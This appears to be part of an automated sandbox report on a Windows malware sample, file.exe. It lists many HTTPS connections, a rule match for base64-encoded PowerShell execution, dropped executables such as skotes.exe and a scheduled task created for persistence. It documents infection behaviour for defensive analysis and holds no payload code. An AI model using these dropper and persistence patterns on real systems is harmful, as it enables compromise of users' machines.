Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50282
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 50296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.64.117.218:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.5:50270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50324 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 mouse low level NULL

System Summary

barindex
Source: amsi32_8712.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.20.dr Static PE information: section name:
Source: skotes.exe.20.dr Static PE information: section name: .idata
Source: random[1].exe.23.dr Static PE information: section name:
Source: random[1].exe.23.dr Static PE information: section name: .idata
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name:
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: .idata
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1[1].exe.23.dr Static PE information: section name: .rsrc
Source: file1[1].exe.23.dr Static PE information: section name: .idata
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name: .rsrc
Source: file1.exe.23.dr Static PE information: section name: .idata
Source: file1.exe.23.dr Static PE information: section name:
Source: 4136f86ac7.exe.23.dr Static PE information: section name:
Source: 4136f86ac7.exe.23.dr Static PE information: section name: .idata
Source: random[1].exe0.23.dr Static PE information: section name:
Source: random[1].exe0.23.dr Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr Static PE information: section name: .idata
Source: random[1].exe0.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name: .rsrc
Source: 3160604f40.exe.23.dr Static PE information: section name: .idata
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C68B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C68B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C68B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C62F280
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FFCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 23_2_00FFCB97
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6235A0 0_2_6C6235A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635440 0_2_6C635440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69545C 0_2_6C69545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69542B 0_2_6C69542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69AC00 0_2_6C69AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C665C10 0_2_6C665C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C672C10 0_2_6C672C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62D4E0 0_2_6C62D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C666CF0 0_2_6C666CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6364C0 0_2_6C6364C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64D4D0 0_2_6C64D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6834A0 0_2_6C6834A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C4A0 0_2_6C68C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636C80 0_2_6C636C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63FD00 0_2_6C63FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64ED10 0_2_6C64ED10
